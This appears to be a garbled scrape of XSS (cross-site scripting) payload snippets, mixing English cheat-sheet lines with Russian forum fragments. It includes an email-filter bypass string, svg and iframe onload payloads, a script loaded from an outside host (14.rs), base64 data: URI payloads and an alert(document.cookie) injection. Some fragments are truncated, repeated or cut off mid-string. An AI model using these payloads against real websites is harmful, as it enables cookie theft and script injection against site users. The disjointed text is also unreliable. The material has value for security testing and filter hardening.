...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
Bypass email filter. (RFC compliant). "><svg/onload=confirm(1)>"@x.y. Bypass document blacklist.
Вчера нашел XSS уязвимость на сайте [Войдите или зарегистрируйтесь для просмотра ссылок]><svg onload=alert
...div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript
Пробелы между аттрибутами в тэге могут заменить слэшем <iframe/onload='alert()' - необязательно закрывать тэг.
<script src=14.rs> you can alsoo specify an arbitratry payload with 14.rs/#payload e.g: 14.rs/#alert(document.domain).
<iframe srcdoc="<svg onload=alert(4);>"> Other obfuscation tricks. In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.
XSS с использованием данных. data:text/html,<script>alert(0)</script>data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ
...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
спрашивает</script><svg onload=alert(document.cookie)> · 1 ответ.